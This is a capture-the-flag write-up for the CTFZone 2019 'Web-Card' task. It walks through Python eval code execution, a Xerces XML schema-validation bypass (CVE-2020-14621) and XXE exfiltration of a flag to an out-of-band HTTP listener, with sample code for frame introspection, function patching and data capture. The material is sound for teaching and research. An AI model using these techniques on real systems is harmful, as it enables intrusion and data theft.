This article describes the steps to solve the Web-Card task designed for CTFZone 2019. The task is a kind of tribute to the XML format and contains a 0-day (as of the competition dates), an unusual way to exploit XXE and a remarkable chain of vulnerabilities.
This write-up was drafted back in December 2019, but we couldn’t publish it until the vendor fixed the vulnerability. Better late than never. Have fun reading!
The landing page of this task has a form, which is used to send the information about a participant to generate a “truly original” card.
Under the hood, the data from the form is sent to the /api/render endpoint inside an XML-based message like this:
The response contains a complex SVG file with the data provided in the request:
STAGE 1
First attempt: XXE through request body
Checking basic XXE payloads gives us some information:
- There’s some XML processing with a standard Java SAX parser from javax.xml.* (standard error messages).
- The file and http (https) schemes are not allowed for general entities.
- The Java web application possibly uses Spring (standard JSON-object format for Internal Server Error).
Second attempt: Fuzzing payload format
An attempt to inject tags fails with an error. Doesn’t seem promising.
Sending an invalid value for an “int-typed” field results in a generic error.
Sending an invalid string for the type attribute reveals details about XML validation: the type attribute value must be “str”, “int” or “float”.
Endpoint discovery
During standard web application enumeration, the “/dev” folder can be found: it responds with status code 403 Forbidden and a “Developers only” message in the body.
Here’s a place for guessing. Why would some developer want to add an extra folder to the application with only one API endpoint? Probably for tests.
So we can check /dev/api/render. And it works!
Third attempt: Fuzzing payload format through developers’ endpoint
Injecting tags, as well as a random type value, fails again, but with a strange error format.
This is interesting: “invalid literal for int() with base 10” is a standard error message from Python. It occurs when you write something like this:
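A minimal way to reproduce that message locally, assuming nothing about the server beyond the fact that it passes a non-numeric string to int():

```python
# Passing a non-numeric string to int() raises ValueError with the
# exact wording seen in the server's error response.
try:
    int("abc")
except ValueError as error:
    message = str(error)

print(message)  # invalid literal for int() with base 10: 'abc'
```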
We already know that “str”, “int” and “float” are valid type attribute values for /api/render. These are also names of valid objects from Python __builtins__, the standard builtin objects:
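The observation suggests that the server resolves the type name to a callable by looking it up among the builtins. The sketch below is a guess at that pattern, not the application's actual code; the function name convert is hypothetical.

```python
import builtins


def convert(type_name, raw_value):
    """Hypothetical converter: resolve type_name among the builtins and call it."""
    caster = getattr(builtins, type_name)
    return caster(raw_value)


print(convert("int", "42"))     # 42
print(convert("float", "1.5"))  # 1.5
print(convert("str", "card"))   # card

# Nothing restricts the lookup to the three "expected" names:
# any other builtin callable resolves just as well.
print(callable(getattr(builtins, "eval")))  # True
```

A lookup like this is safe only while the set of accepted names is restricted before the value reaches it.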
We can try to use the eval function as the value of the type attribute and a string with a Python expression (100499+1) as the value of the value attribute:
The server returns 100500 as the result of the evaluation. This means that we are able to run arbitrary code in the context of the web application.
We use eval instead of exec, because exec doesn’t return any value, and we want to see the result in the response instead of None.
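The difference is easy to check in a local interpreter:

```python
# eval() evaluates a single expression and returns its value.
eval_result = eval("100499+1")

# exec() runs statements but always returns None; any value it computes
# has to be retrieved from the namespace it ran in.
namespace = {}
exec_result = exec("total = 100499+1", namespace)

print(eval_result)         # 100500
print(exec_result)         # None
print(namespace["total"])  # 100500
```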
Investigating server through RCE
It’s time to make some preparations. To send arbitrary code for evaluation and ensure it runs as intended, it is good to write some code to automate these tasks.
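One possible building block for such automation is sketched below. It is not the script used for the task: the helper name wrap_payload and the convention of returning a variable called result are assumptions made for illustration. The idea is to turn a multi-line snippet into a single expression that eval accepts, with the source base64-encoded so that it contains no characters that need escaping inside a double-quoted XML attribute.

```python
import base64


def wrap_payload(source):
    """Return one Python expression that runs `source` and yields its `result` variable.

    Hypothetical helper: eval() accepts only expressions, so the statements
    are executed with exec() inside a lambda, and `result` is read back from
    the namespace the code ran in.
    """
    encoded = base64.b64encode(source.encode()).decode()
    return (
        "(lambda ns: (exec(__import__('base64').b64decode('%s').decode(), ns), "
        "ns.get('result'))[1])({})" % encoded
    )


expression = wrap_payload("x = 100499\nresult = x + 1")
print(eval(expression))  # 100500
```

The returned string would be sent as the value to evaluate; how it is embedded in the request depends on the message format, which is not reproduced here.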
Example of usage:
Result printed to console: “Application user is: app”
For simplicity, further in this article, every payload and result will be written as Python code with comments:
Searching for information
Listing application directory:
What do we see here?
- bottle.py: Bottle, a single-file web framework for Python.
- card_render: an application folder with source files.
- network-hint.md: a file with a hint:
{internet} -> 80:[front] -> 4041:[waf]{FLAG is here} -> 3031:[app]
                   |
                   |
                   ------> 3031:[app-dev]
So we are on app-dev and our goal is to hack the waf that works between the user and the production app.
Network connectivity
Everybody wants a reverse shell after RCE, but whether one is possible depends on network connectivity. Using wget or the Python socket module, we can check that there's no TCP/UDP connectivity from app-dev to the Internet.
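A TCP check of this kind can be sketched with the socket module alone. The function name can_connect is made up for illustration, and the sketch covers TCP only; the target host and port are whatever external address you control.

```python
import socket


def can_connect(host, port, timeout=3.0):
    """Return True if a TCP connection to (host, port) succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts and name resolution failures.
        return False
```

Sent through the RCE, a call such as can_connect("example.com", 80) returning False for every external target is what indicates that outbound traffic is blocked.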
Results
Now we know that:
- app is a Python web application that renders SVG and has an RCE vulnerability.
- app-dev is an instance of app, but for testing purposes.
- waf is a Java web application that validates requests for app and makes the RCE in app unexploitable.
- The FLAG for this challenge is stored on the waf machine.
STAGE 2
WAF Bypass
We can make some preparations to do research on XML validation via javax.xml.*.
Here we have the source code of a utility that tests an XML file against an XSD schema, schema.xsd with the schema definition, and two test files: valid.xml and invalid_num.xml.
The schema restricts the structure of <root_element> with a positive attribute nat and an inner element <some_num> with a decimal body.
valid.xml is valid for schema.xsd. invalid_num.xml has a non-decimal value inside the <some_num> element and is therefore invalid.
Results of running the utility for XML files:
Playing with invalid XML document
Here you need to find a 0-day to bypass validation. There are not many things you can play with: the internal DTD and namespaces.
You can add an xmlns attribute to any tag to make it “namespaced” so that its definition is looked up in the specified namespace.
Testing the “namespaced” version results in another error message:
It looks like the validation engine “Cannot find the declaration of element ‘root_element’” in the h4ck3r namespace.
But that’s not a problem: we can add definitions by means of an internal DTD:
PWNED! Validation is bypassed successfully. But what happened?
This is a bug in Apache Xerces 2 for Java. schema.xsd defines validation rules in the '' (empty) namespace. In our payload we change the namespace to h4ck3r and add a definition for <root_element> to it. The validation engine behaves incorrectly: it merges the definitions from the schema and the internal DTD, whereas it should ignore everything not related to the schema.
STAGE 3
Now we can update our attacking script to work with the production API endpoint — adding WAF bypass logic:
Searching vectors to WAF
According to the network hint, there must be some vulnerability on the WAF that will expose the FLAG.
The possible candidates are:
- hidden vulnerable endpoint/service that is only accessible from the internal network
- XML processing of the SVG response from the app
First of all, we need to find the IP address of the WAF. We could use some standard utilities to determine this IP but it’s not interesting. Another approach is to traverse the application's internals by means of Python's huge introspection capabilities.
We can inspect the call frames using a payload like this:
In the frame at offset 11 (the exact offset depends on the number of frames added by the exploit payload) we can find the IP of waf in the REMOTE_ADDR header:
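The frame-walking idea can be sketched as follows. This is an illustration rather than the payload used in the task: the function names and the address 10.0.0.5 are made up, and sys._getframe is a CPython-specific call. Searching every frame for a dictionary that contains the key avoids hard-coding the frame offset.

```python
import sys


def find_in_frames(key):
    """Walk up the call stack; return (depth, value) for the first local dict holding `key`."""
    frame = sys._getframe(1)  # start at the caller's frame
    depth = 1
    while frame is not None:
        for value in list(frame.f_locals.values()):
            if isinstance(value, dict) and key in value:
                return depth, value[key]
        frame = frame.f_back
        depth += 1
    return None


def handle_request(environ):
    # Stand-in for a framework entry point that holds the request environment.
    return render()


def render():
    # Stand-in for the code path where the injected expression is evaluated.
    return find_in_frames("REMOTE_ADDR")


print(handle_request({"REMOTE_ADDR": "10.0.0.5"}))  # (2, '10.0.0.5')
```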
Tests with the socket module show that the firewall allows only established connections from waf to app.
So the waf attack surface is limited to the SVG response from app. Because of the XML-ish nature of SVG, an XXE payload is the obvious choice, but we need to figure out how to deliver it.
Attack on the way back
We need to replace the SVG in the response from app with our XXE payload.
By means of RCE we can dump the application code and see that there’s a function called render_svg_from_profile that returns the final SVG as a string:
The function parse_and_render uses the original function object render_svg_from_profile, imported into the namespace of the card_render.webapp module. So, if we replace this function with our patched version within the webapp module, we can manipulate the data in the response. This is an exec payload that defines a function patch_renderer:
This function applies a one-time patch with a secret condition that overrides the original function render_svg_from_profile to return the attacker’s payload.
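The patching technique can be illustrated on a stand-in module. Everything below is a sketch under assumptions: the module contents, the profile layout, the secret value and the signature of patch_renderer are invented for the example, and "one-time" is interpreted as "the patch is applied at most once".

```python
import types

# Stand-in for the card_render.webapp module (its real contents are not shown here).
webapp = types.ModuleType("webapp")
exec(
    "def render_svg_from_profile(profile):\n"
    "    return '<svg>' + profile['name'] + '</svg>'\n"
    "\n"
    "def parse_and_render(profile):\n"
    "    # The name is looked up in the module namespace on every call.\n"
    "    return render_svg_from_profile(profile)\n",
    webapp.__dict__,
)


def patch_renderer(module, secret, payload):
    """Replace module.render_svg_from_profile once; serve `payload` only for `secret`."""
    original = module.render_svg_from_profile
    if getattr(original, "_patched", False):
        return  # already patched, do not wrap a second time

    def patched(profile):
        if profile.get("name") == secret:
            return payload        # attacker-controlled response
        return original(profile)  # everyone else sees normal behaviour

    patched._patched = True
    module.render_svg_from_profile = patched


patch_renderer(webapp, "s3cret", "<svg>payload</svg>")
print(webapp.parse_and_render({"name": "alice"}))   # <svg>alice</svg>
print(webapp.parse_and_render({"name": "s3cret"}))  # <svg>payload</svg>
```

The secret condition keeps the patch invisible to other users of the same application instance.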
Example of usage:
A response with invalid XML leads to an error. Let’s run some tests:
Conclusions from the test results:
- There is response validation against an SVG schema (tests 1, 5, 6, 7).
- During response validation, waf resolves external entities and allows external HTTP requests (test 3).
- An invalid attribute value for the SVG element rect is reflected in the response error message (test 7).
Given these results, it would be ideal to be able to place the result of external entity resolution into the value of some attribute of the rect element. This can be achieved with DTD: <!ATTLIST rect height CDATA "500">. This piece of DTD defines a default value for the height attribute of the rect element.
<!ATTLIST ...> is an attribute declaration in DTD.
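The effect of an attribute default can be observed with Python's expat bindings, which by default report attributes derived from declarations in the internal DTD alongside those written in the document. This only illustrates the DTD mechanism; it says nothing about how the Java parser on waf is configured, and the function name collect_attributes is made up.

```python
from xml.parsers import expat

DOCUMENT = (
    '<!DOCTYPE svg [<!ATTLIST rect height CDATA "500">]>'
    '<svg><rect width="10"/></svg>'
)


def collect_attributes(document):
    """Parse `document` and return {element name: attributes} as the parser reports them."""
    seen = {}

    def on_start(name, attrs):
        seen[name] = dict(attrs)

    parser = expat.ParserCreate()
    parser.StartElementHandler = on_start
    parser.Parse(document, True)
    return seen


attributes = collect_attributes(DOCUMENT)
print(attributes["rect"]["height"])  # 500, although the document never sets it
```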
So we can prepare an external DTD that does the same thing except it takes the default value from internal DTD context:
Payload with file reading or directory listing capabilities:
Note that %height_default; is defined in the internal DTD but used inside the external DTD. This is very convenient because the remote part of the payload stays constant.
We can apply this payload to list the directories on the waf:
We see the “/app” folder and list it in the same way:
“/app/flag1998.txt” is our goal. But if we try to read it:
Ok, we are detected, but we can send it in an OOB manner:
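On the receiving side, an out-of-band channel needs nothing more than an HTTP listener that records the query string of incoming requests. A minimal sketch with the standard library follows; the names CaptureHandler, start_listener and captured are made up, and in a real attack the listener would run on an Internet-facing host rather than on 127.0.0.1.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

captured = []  # query strings of every request received


class CaptureHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Whatever follows "?" in the requested URL is the exfiltrated data.
        captured.append(urlsplit(self.path).query)
        self.send_response(200)
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep the console quiet; data is kept in `captured`


def start_listener(host="127.0.0.1", port=0):
    """Start the listener in a background thread and return the server object."""
    server = HTTPServer((host, port), CaptureHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Calling start_listener() returns the server; its server_address attribute holds the port actually bound when port 0 is requested.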
And WIN:
172.42.73.7 - [11/Feb/2021 03:13:37]
"GET /?ctf.zone{78806158f1928b18ec1a583c0b9b82c5} HTTP/1.1" 200 -
The whole chain
BONUS: Original design w/o simplification :)
Originally, the waf had no connection to the Internet. So, OOB XXE was not applicable.
I assumed that the participants would guess that they could register a new endpoint in the app to store atk.dtd. Also, in the original version there was no filtering of error messages, so the flag could be obtained via an error message.
The idea of intended patching was very tasty, but we were not sure that everyone would patch it in a silent manner, with blackjack and secret conditions. So, it could lead to a situation where someone patches app and all the participants get the flag. To fix this, we decided to filter the flag in error messages from waf and allow the Internet as a channel to deliver the flag outside the regular flow.
Credits
Roman Shemyakin (@ramon93i7): Design, Implementation, CVE-2020-14621
Vlad Lazarev (@Val1d): “Roma, please, make it s1mpler!”